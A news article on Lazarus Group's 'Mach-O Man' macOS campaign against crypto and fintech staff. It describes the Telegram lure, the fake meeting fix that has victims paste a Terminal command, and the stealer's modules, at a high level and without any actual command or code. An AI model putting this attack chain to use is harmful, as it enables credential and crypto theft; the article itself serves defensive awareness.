Key Highlights
- Lazarus Group is running a macOS-focused cyber campaign called “Mach-O Man,” targeting crypto and fintech workers.
- The attack uses social engineering to trick users into running a Terminal command that installs malware to steal private information.
- The group has stolen billions in crypto over the years and continues to use more advanced methods like this campaign.
A senior blockchain security researcher at Certik reportedly said that North Korea’s Lazarus Group is running a new macOS-focused campaign called the “Mach-O Man.”
According to a report, the campaign is said to target macOS users working in crypto, fintech, and other high-value companies.
How the “Mach-O Man” campaign works
Security analyst ANY.RUN provided a detailed review of the attack. The campaign usually starts on Telegram. A victim receives what looks like a normal meeting invite, often from someone they already know or trust, because the account has been hacked.
The message then tells the victim to join a meeting on platforms like Zoom, Microsoft Teams, or Google Meet. After clicking, they are sent to a fake support page that says there is a problem with joining the meeting. The page then asks the user to copy and paste a command into macOS Terminal to fix the issue. This is the key step used to install the malware.
Once the command runs, a first-stage malware file is activated. It downloads a fake macOS application that looks like regular software uses built-in system tools, so it looks “trusted” to macOS security checks, which helps it avoid being blocked by basic protections and makes it harder for users to notice anything wrong.
Inside the malware system
According to ANY.RUN, the malware package is built using Go-based Mach-O binaries and is split into several parts. One component acts as a stager that launches the infection process. Another part collects system information from the device, including the computer name, operating system version, CPU details, network setup, running programs, and browser extensions.
It also checks popular browsers like Chrome, Safari, Firefox, Brave, Opera, and Vivaldi. All this data is packed together and sent back to the hacker using Telegram.
Another module is built to stay inside the system for a long time. It hides files in system folders and uses startup features on macOS, so it runs every time the computer is turned on. This means even if the system is restarted, the malware does not go away.
A final module focuses on stealing sensitive data, including browser cookies, stored login details, and macOS Keychain information. The stolen data is packed into archive files and sent to attackers using Telegram bot infrastructure.
Security researchers also noted that the malware includes cleanup features that attempt to remove traces after stealing data. Some parts of the code are poorly built, and there are mistakes like exposed bot tokens, but it still works because users are tricked into running the commands themselves.
Why security measures matter
The risk for crypto and fintech firms is high. If one computer is infected, attackers may gain access to wallet seed phrases, exchange API keys, internal admin tools, and company systems. From there, they can move deeper into networks or even carry out illegal transactions without permission.
Lazarus Group has been linked to multiple large-scale crypto attacks over the years. The group has stolen billions of dollars in digital assets since 2017, using a mix of hacking, social engineering, and long-term infiltration tactics.
Recently, the group was linked to an exploit on KelpDAO, in which they stole about $290 million, and to the Bybit exchange exploit. In fact, the group had, in total, taken about $7.3 billion from crypto firms in the last four years.
The group also uses methods beyond direct hacking, including fake identities and insider access, to infiltrate organizations over time before executing attacks.
Also Read: Kelp DAO Hacker Routes Stolen Funds to Tron in Fresh Laundering Push
